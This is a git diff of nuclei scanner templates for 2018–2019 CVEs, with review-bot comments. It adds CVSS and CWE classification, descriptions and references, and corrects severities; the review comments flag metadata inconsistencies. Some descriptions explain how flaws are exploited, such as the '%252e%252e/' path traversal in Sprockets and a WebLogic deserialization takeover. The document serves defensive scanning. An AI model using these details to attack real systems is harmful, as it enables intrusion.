cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-20470.yaml b/cves/2018/CVE-2018-20470.yaml index 980bd20b83..15ee6fd76f 100644 --- a/cves/2018/CVE-2018-20470.yaml +++ b/cves/2018/CVE-2018-20470.yaml @@ -9,6 +9,11 @@ info: - https://barriersec.com/2019/06/cve-2018-20470-sahi-pro/ - https://www.cvedetails.com/cve/CVE-2018-20470 tags: cve,cve2018,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-20470 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-20824.yaml b/cves/2018/CVE-2018-20824.yaml index a86b7d6a62..174487aad6 100644 --- a/cves/2018/CVE-2018-20824.yaml +++ b/cves/2018/CVE-2018-20824.yaml 
@@ -6,6 +6,13 @@ info: severity: medium description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter. tags: cve,cve2018,atlassian,jira,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-20824 + cwe-id: CWE-79 + reference: + - https://jira.atlassian.com/browse/JRASERVER-69238 requests: - method: GET diff --git a/cves/2018/CVE-2018-20985.yaml b/cves/2018/CVE-2018-20985.yaml index b2e578153b..9158d407cd 100644 --- a/cves/2018/CVE-2018-20985.yaml +++ b/cves/2018/CVE-2018-20985.yaml @@ -7,8 +7,13 @@ info: reference: - https://www.pluginvulnerabilities.com/2018/12/06/our-improved-proactive-monitoring-has-now-caught-a-local-file-inclusion-lfi-vulnerability-as-well/ - https://www.cvedetails.com/cve/CVE-2018-20985/ - severity: high + severity: critical tags: cve,cve2018,wordpress,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-20985 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2018/CVE-2018-2392.yaml b/cves/2018/CVE-2018-2392.yaml index 23b40cee1b..448abf9d82 100644 --- a/cves/2018/CVE-2018-2392.yaml +++ b/cves/2018/CVE-2018-2392.yaml @@ -13,6 +13,11 @@ info: - https://www.rapid7.com/db/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe/ - https://troopers.de/troopers18/agenda/3r38lr/ - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/sap/sap_igs_xmlchart_xxe.rb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2018-2392 + cwe-id: CWE-611 requests: - raw: diff --git a/cves/2018/CVE-2018-2628.yaml b/cves/2018/CVE-2018-2628.yaml index 0421d15888..86e858609d 100644 --- a/cves/2018/CVE-2018-2628.yaml +++ b/cves/2018/CVE-2018-2628.yaml 
@@ -3,9 +3,15 @@ id: CVE-2018-2628 info: name: Oracle WebLogic Server Deserialization RCE author: milo2012 - severity: high + severity: critical reference: https://www.nc-lp.com/blog/weaponize-oracle-weblogic-server-poc-cve-2018-2628 tags: cve,cve2018,oracle,weblogic,network + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2628 + cwe-id: CWE-502 + description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." network: - inputs: diff --git a/cves/2018/CVE-2018-2791.yaml b/cves/2018/CVE-2018-2791.yaml index ab909a6e61..5dd0c7f892 100644 --- a/cves/2018/CVE-2018-2791.yaml +++ b/cves/2018/CVE-2018-2791.yaml @@ -3,9 +3,18 @@ id: CVE-2018-2791 info: name: Oracle WebCenter Sites XSS author: madrobot - severity: medium + severity: high description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware tags: cve,cve2018,oracle,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N + cvss-score: 8.20 + cve-id: CVE-2018-2791 + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html + - http://www.securitytracker.com/id/1040695 + - http://www.securityfocus.com/bid/103800 + - https://www.exploit-db.com/exploits/44752/ requests: - method: GET diff --git a/cves/2018/CVE-2018-2893.yaml b/cves/2018/CVE-2018-2893.yaml index 4fc9fa8c42..f87d6e3fa4 100644 --- a/cves/2018/CVE-2018-2893.yaml 
+++ b/cves/2018/CVE-2018-2893.yaml @@ -3,9 +3,14 @@ id: CVE-2018-2893 info: name: Oracle WebLogic Server Deserialization RCE (CVE-2018-2893) author: milo2012 - severity: high + severity: critical tags: cve,cve2018,weblogic,network reference: https://www.anquanke.com/post/id/152164, https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2893 + description: "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Core Components). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)." network: - inputs: diff --git a/cves/2018/CVE-2018-2894.yaml b/cves/2018/CVE-2018-2894.yaml index 7b96e235fa..a192dae23d 100644 --- a/cves/2018/CVE-2018-2894.yaml +++ b/cves/2018/CVE-2018-2894.yaml @@ -7,6 +7,10 @@ info: reference: https://blog.detectify.com/2018/11/14/technical-explanation-of-cve-2018-2894-oracle-weblogic-rce/ severity: critical tags: cve,cve2018,oracle,weblogic,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-2894 requests: - method: GET diff --git a/cves/2018/CVE-2018-3167.yaml b/cves/2018/CVE-2018-3167.yaml index a69023eef5..45ba1789ea 100644 --- a/cves/2018/CVE-2018-3167.yaml +++ b/cves/2018/CVE-2018-3167.yaml 
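Review bot: The retained `reference:` line in the CVE-2018-2893 hunk holds two URLs in one plain scalar separated by a comma, so nuclei will report a single malformed reference rather than two links; since this hunk already edits the `info` block, split it into a sequence: `reference:` / `  - https://www.anquanke.com/post/id/152164` / `  - https://vulners.com/nessus/WEBLOGIC_CVE_2018_2893.NASL`. Unlike the sibling CVE-2018-2628 hunk, which adds `cwe-id: CWE-502` for the same WebLogic T3 deserialization class of issue, this one adds no `cwe-id:` at all; `cwe-id: CWE-502` would keep the two WebLogic templates consistent, unless the value was deliberately omitted because NVD lists none.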
@@ -3,9 +3,17 @@ id: CVE-2018-3167 info: name: Unauthenticated Blind SSRF in Oracle EBS author: geeknik - severity: low + severity: medium description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145 tags: cve,cve2018,oracle,ebs,ssrf + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-3167 + reference: + - http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html + - http://www.securitytracker.com/id/1041897 + - http://www.securityfocus.com/bid/105627 requests: - method: POST diff --git a/cves/2018/CVE-2018-3714.yaml b/cves/2018/CVE-2018-3714.yaml index 27ef1d003f..e44ca7a0b5 100644 --- a/cves/2018/CVE-2018-3714.yaml +++ b/cves/2018/CVE-2018-3714.yaml @@ -2,9 +2,15 @@ id: CVE-2018-3714 info: name: node-srv Path Traversal author: madrobot - severity: high + severity: medium reference: https://hackerone.com/reports/309124 tags: cve,cve2018,nodejs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2018-3714 + cwe-id: CWE-22 + description: "node-srv node module suffers from a Path Traversal vulnerability due to lack of validation of url, which allows a malicious user to read content of any file with known path." requests: - method: GET diff --git a/cves/2018/CVE-2018-3760.yaml b/cves/2018/CVE-2018-3760.yaml index 49b4dc9d42..221891cb15 100644 --- a/cves/2018/CVE-2018-3760.yaml +++ b/cves/2018/CVE-2018-3760.yaml 
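Review bot: In the CVE-2018-3167 hunk `description:` still contains only a URL (`https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145`) while a proper `reference:` list is being added in the same hunk; the URL belongs in that list and `description` should summarise what the template checks. Suggest appending the medium.com link to the new `reference:` sequence and replacing the description with a sentence such as `description: Unauthenticated blind SSRF in Oracle E-Business Suite; see references for affected versions.` (wording to be confirmed against the linked advisory). Leaving a bare URL as the description means downstream consumers of the classification data show no summary for this finding.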
@@ -13,6 +13,11 @@ info: Ruby On Rails is a well-known Ruby Web development framework, which uses Sprockets as a static file server in development environment. Sprockets is a Ruby library that compiles and distributes static resource files. There is a path traversal vulnerability caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. tags: cve,cve2018,rails,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-3760 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2018/CVE-2018-3810.yaml b/cves/2018/CVE-2018-3810.yaml index 84323e0f2a..d7c71edf22 100644 --- a/cves/2018/CVE-2018-3810.yaml +++ b/cves/2018/CVE-2018-3810.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.exploit-db.com/exploits/43420 tags: wordpress,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-3810 + cwe-id: CWE-287 + description: "Authentication Bypass vulnerability in the Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code." requests: - method: POST diff --git a/cves/2018/CVE-2018-5230.yaml b/cves/2018/CVE-2018-5230.yaml index 4a1d51ccd1..3073e580b5 100644 --- a/cves/2018/CVE-2018-5230.yaml +++ b/cves/2018/CVE-2018-5230.yaml 
@@ -5,6 +5,14 @@ info: author: madrobot severity: medium tags: cve,cve2018,atlassian,confluence,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5230 + cwe-id: CWE-79 + description: "The issue collector in Atlassian Jira before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4 and from version 7.9.0 before version 7.9.2 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the error message of custom fields when an invalid value is specified." + reference: + - https://jira.atlassian.com/browse/JRASERVER-67289 requests: - method: GET diff --git a/cves/2018/CVE-2018-5233.yaml b/cves/2018/CVE-2018-5233.yaml index 6dd9374e44..611c7a3a1e 100644 --- a/cves/2018/CVE-2018-5233.yaml +++ b/cves/2018/CVE-2018-5233.yaml @@ -8,6 +8,11 @@ info: Cross-site scripting (XSS) vulnerability in system/src/Grav/Common/Twig/Twig.php in Grav CMS before 1.3.0 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5233 tags: cve,cve2018,xss,grav + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5233 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2018/CVE-2018-5316.yaml b/cves/2018/CVE-2018-5316.yaml index 13f88cb96b..f2a21c4a73 100644 --- a/cves/2018/CVE-2018-5316.yaml +++ b/cves/2018/CVE-2018-5316.yaml @@ -7,6 +7,11 @@ info: description: The SagePay Server Gateway for WooCommerce plugin before 1.0.9 for WordPress has XSS via the includes/pages/redirect.php page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-5316 tags: cve,cve2018,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-5316 + cwe-id: CWE-79 requests: - method: GET 
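Review bot: The description added in the CVE-2018-5230 hunk describes the issue collector in Atlassian Jira (7.6.6 / 7.7.4 / 7.8.4 / 7.9.2, reference JRASERVER-67289), yet the retained `tags:` line still reads `cve,cve2018,atlassian,confluence,xss`, so the template now contradicts itself. If the description and the JRASERVER reference are correct the tag line should become `tags: cve,cve2018,atlassian,jira,xss`. Please also confirm that the request path (outside this hunk) targets Jira's issue collector rather than a Confluence endpoint, since the tag suggests the template may originally have been written against the wrong product.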
diff --git a/cves/2018/CVE-2018-6008.yaml b/cves/2018/CVE-2018-6008.yaml index 65848e8da0..fc531f1cd6 100644 --- a/cves/2018/CVE-2018-6008.yaml +++ b/cves/2018/CVE-2018-6008.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/43913 - https://www.cvedetails.com/cve/CVE-2018-6008 tags: cve,cve2018,joomla,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-6008 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-6910.yaml b/cves/2018/CVE-2018-6910.yaml index 03cc1ee5c9..dede5965e4 100644 --- a/cves/2018/CVE-2018-6910.yaml +++ b/cves/2018/CVE-2018-6910.yaml @@ -7,6 +7,11 @@ info: reference: https://nvd.nist.gov/vuln/detail/CVE-2018-6910 description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php tags: cve,cve2018,dedecms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-6910 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml index f9994ccfb5..d89c8df6dd 100644 --- a/cves/2018/CVE-2018-7251.yaml +++ b/cves/2018/CVE-2018-7251.yaml 
@@ -3,8 +3,20 @@ id: CVE-2018-7251 info: name: AnchorCMS Error Log Exposure author: pdteam - severity: medium + severity: critical tags: cve,cve2018,anchorcms,logs + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7251 + cwe-id: CWE-200 + description: "An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as \"Too many connections\") has occurred." + reference: + - https://github.com/anchorcms/anchor-cms/issues/1247 + - http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html + - https://twitter.com/finnwea/status/965279233030393856 + - http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html + - https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7 requests: - method: GET diff --git a/cves/2018/CVE-2018-7422.yaml b/cves/2018/CVE-2018-7422.yaml index 8cb678bdfd..d05e72261a 100644 --- a/cves/2018/CVE-2018-7422.yaml +++ b/cves/2018/CVE-2018-7422.yaml @@ -7,6 +7,11 @@ info: tags: cve,cve2018,wordpress,wp-plugin,lfi description: A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. reference: https://www.exploit-db.com/exploits/44340 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7422 + cwe-id: CWE-22,CWE-829 requests: - method: GET diff --git a/cves/2018/CVE-2018-7490.yaml b/cves/2018/CVE-2018-7490.yaml index a2cb244508..1e3744b1e1 100644 --- a/cves/2018/CVE-2018-7490.yaml +++ b/cves/2018/CVE-2018-7490.yaml 
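Review bot: The CVE-2018-7251 hunk raises `severity` from medium to critical (CVSS 9.8), but the description it adds says the log "contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred" — the credential leak is conditional. If the matcher (outside this hunk) only confirms that `errors.log` is reachable, a hit does not by itself prove credential exposure, so every finding will be reported as critical even when the log holds nothing sensitive. Consider either matching on a credential-bearing pattern in the log body in addition to the path, or extending the description with a sentence such as `Severity reflects the credential-disclosure case; confirm the retrieved log actually contains database credentials.`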
@@ -5,6 +5,16 @@ info: author: madrobot severity: high tags: cve,cve2018,uwsgi,php,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7490 + cwe-id: CWE-22 + description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal." + reference: + - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html + - https://www.exploit-db.com/exploits/44223/ + - https://www.debian.org/security/2018/dsa-4142 requests: - method: GET diff --git a/cves/2018/CVE-2018-7600.yaml b/cves/2018/CVE-2018-7600.yaml index 9aff058ee4..13c2a5fc08 100644 --- a/cves/2018/CVE-2018-7600.yaml +++ b/cves/2018/CVE-2018-7600.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://github.com/vulhub/vulhub/tree/master/drupal/CVE-2018-7600 tags: cve,cve2018,drupal,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-7600 + cwe-id: CWE-20 + description: "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations." requests: - raw: diff --git a/cves/2018/CVE-2018-7700.yaml b/cves/2018/CVE-2018-7700.yaml index de3d622d4c..32b525bf7f 100644 --- a/cves/2018/CVE-2018-7700.yaml +++ b/cves/2018/CVE-2018-7700.yaml 
@@ -6,6 +6,12 @@ info: severity: high reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ tags: cve,cve2018,dedecms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 + description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." requests: - method: GET diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml index e49839a2e0..4c909a65b6 100644 --- a/cves/2018/CVE-2018-8006.yaml +++ b/cves/2018/CVE-2018-8006.yaml 
@@ -5,6 +5,23 @@ info: author: pdteam severity: medium tags: cve,cve2018,apache,activemq,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2018-8006 + cwe-id: CWE-79 + description: "An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the queue.jsp page of Apache ActiveMQ versions 5.0.0 to 5.15.5. The root cause of this issue is improper data filtering of the QueueFilter parameter." + reference: + - http://activemq.apache.org/security-advisories.data/CVE-2018-8006-announcement.txt + - http://www.securityfocus.com/bid/105156 + - https://lists.apache.org/thread.html/2b5c0039197a4949f29e1e2c9441ab38d242946b966f61c110808bcc@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/fcbe6ad00f1de142148c20d813fae3765dc4274955e3e2f3ca19ff7b@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/a859563f05fbe7c31916b3178c2697165bd9bbf5a65d1cf62aef27d2@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/03f91b1fb85686a848cee6b90112cf6059bd1b21b23bacaa11a962e1@%3Cdev.activemq.apache.org%3E + - https://lists.apache.org/thread.html/3f1e41bc9153936e065ca3094bd89ff8167ad2d39ac0b410f24382d2@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/c0ec53b72b3240b187afb1cf67e4309a9e5f607282010aa196734814@%3Cgitbox.activemq.apache.org%3E + - https://lists.apache.org/thread.html/rb698ed085f79e56146ca24ab359c9ef95846618675ea1ef402e04a6d@%3Ccommits.activemq.apache.org%3E + - https://lists.apache.org/thread.html/r946488fb942fd35c6a6e0359f52504a558ed438574a8f14d36d7dcd7@%3Ccommits.activemq.apache.org%3E requests: - method: GET diff --git a/cves/2018/CVE-2018-8033.yaml b/cves/2018/CVE-2018-8033.yaml index 8904dd11ea..55f1fd7a8c 100644 --- a/cves/2018/CVE-2018-8033.yaml +++ b/cves/2018/CVE-2018-8033.yaml 
@@ -6,6 +6,13 @@ info: severity: high description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04 tags: cve,cve2018,apache,ofbiz,xxe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-8033 + cwe-id: CWE-200 + reference: + - https://lists.apache.org/thread.html/e8fb551e86e901932081f81ee9985bb72052b4d412f23d89b1282777@%3Cuser.ofbiz.apache.org%3E requests: - raw: diff --git a/cves/2018/CVE-2018-8715.yaml b/cves/2018/CVE-2018-8715.yaml index 7341f180dd..01005c6032 100644 --- a/cves/2018/CVE-2018-8715.yaml +++ b/cves/2018/CVE-2018-8715.yaml @@ -8,6 +8,11 @@ info: tags: cve,cve2018,appweb,auth-bypass reference: - https://github.com/embedthis/appweb/issues/610 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2018-8715 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2018/CVE-2018-8719.yaml b/cves/2018/CVE-2018-8719.yaml index ccef2695c1..022985a814 100644 --- a/cves/2018/CVE-2018-8719.yaml +++ b/cves/2018/CVE-2018-8719.yaml @@ -10,6 +10,11 @@ info: - https://vuldb.com/?id.115817 - https://www.cvedetails.com/cve/CVE-2018-8719/ tags: wordpress,wp-plugin,cve,cve2018,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-8719 + cwe-id: CWE-532 requests: - method: GET diff --git a/cves/2018/CVE-2018-8770.yaml b/cves/2018/CVE-2018-8770.yaml index 442020990c..1f57cd812d 100644 --- a/cves/2018/CVE-2018-8770.yaml +++ b/cves/2018/CVE-2018-8770.yaml @@ -8,6 +8,11 @@ info: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770 - https://www.exploit-db.com/exploits/44495/ tags: cve,cve2018,cobub,razor,exposure + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2018-8770 + cwe-id: CWE-200 requests: - method: GET 
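Review bot: In the CVE-2018-8033 hunk the new `cwe-id: CWE-200` labels an XXE file-disclosure issue, while the sibling CVE-2018-2392 XXE hunk in this same commit uses `cwe-id: CWE-611`, the specific weakness for external entity injection. If the value is copied verbatim from NVD it can stay, but otherwise `cwe-id: CWE-611` keeps the two XXE templates consistent and makes the weakness queryable. The `reference:` list that follows must be indented under `info`, not under `classification`; the collapsed diff hides the indentation, so please verify.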
diff --git a/cves/2018/CVE-2018-9118.yaml b/cves/2018/CVE-2018-9118.yaml index 13722267ef..3440542393 100644 --- a/cves/2018/CVE-2018-9118.yaml +++ b/cves/2018/CVE-2018-9118.yaml @@ -7,6 +7,11 @@ info: description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability reference: https://www.exploit-db.com/exploits/44417 tags: wordpress,wp-plugin,lfi,cve,cve2018 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-9118 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2018/CVE-2018-9995.yaml b/cves/2018/CVE-2018-9995.yaml index d97e5a8118..49ed20338b 100644 --- a/cves/2018/CVE-2018-9995.yaml +++ b/cves/2018/CVE-2018-9995.yaml @@ -2,7 +2,7 @@ id: CVE-2018-9995 info: name: DVR Authentication Bypass author: princechaddha - severity: high + severity: critical description: | TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass @@ -14,6 +14,10 @@ info: - https://www.bleepingcomputer.com/news/security/new-hacking-tool-lets-users-access-a-bunch-of-dvrs-and-their-video-feeds/ - https://www.exploit-db.com/exploits/44577/ tags: cve,cve2018,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2018-9995 requests: - method: GET diff --git a/cves/2019/CVE-2019-0193.yaml b/cves/2019/CVE-2019-0193.yaml index ff40e30a68..84af6836bc 100644 --- a/cves/2019/CVE-2019-0193.yaml +++ b/cves/2019/CVE-2019-0193.yaml 
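Review bot: The CVE-2018-9995 hunk adds a `classification:` block without a `cwe-id:`, while almost every other hunk in this commit includes one; an authentication-bypass issue (tag `auth-bypass`, name "DVR Authentication Bypass") maps to `cwe-id: CWE-287`, the same value this commit uses for the CVE-2018-8715 and CVE-2018-3810 auth-bypass templates. Adding it keeps the classification data uniformly filterable by weakness. The same omission appears in the CVE-2018-2791, CVE-2018-2893, CVE-2018-2894 and CVE-2019-11580 hunks; if a CWE is genuinely unassigned upstream, a brief `# no CWE assigned by NVD` comment would make the gap deliberate rather than accidental.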
@@ -4,12 +4,17 @@ info: name: Apache Solr - DataImportHandler RCE description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. author: pdteam - severity: critical + severity: high reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-0193 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 - https://paper.seebug.org/1009/ tags: cve,cve2019,apache,rce,solr,oob + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2019-0193 + cwe-id: CWE-94 requests: - raw: diff --git a/cves/2019/CVE-2019-0221.yaml b/cves/2019/CVE-2019-0221.yaml index 8527f6724d..5369a5b00a 100644 --- a/cves/2019/CVE-2019-0221.yaml +++ b/cves/2019/CVE-2019-0221.yaml @@ -3,7 +3,7 @@ id: CVE-2019-0221 info: name: Apache Tomcat XSS author: pikpikcu - severity: low + severity: medium reference: - https://seclists.org/fulldisclosure/2019/May/50 - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ @@ -14,6 +14,11 @@ info: therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. tags: cve,cve2019,apache,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2019-0221 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2019/CVE-2019-0230.yaml b/cves/2019/CVE-2019-0230.yaml index 0c52c1b430..afe490d14c 100644 
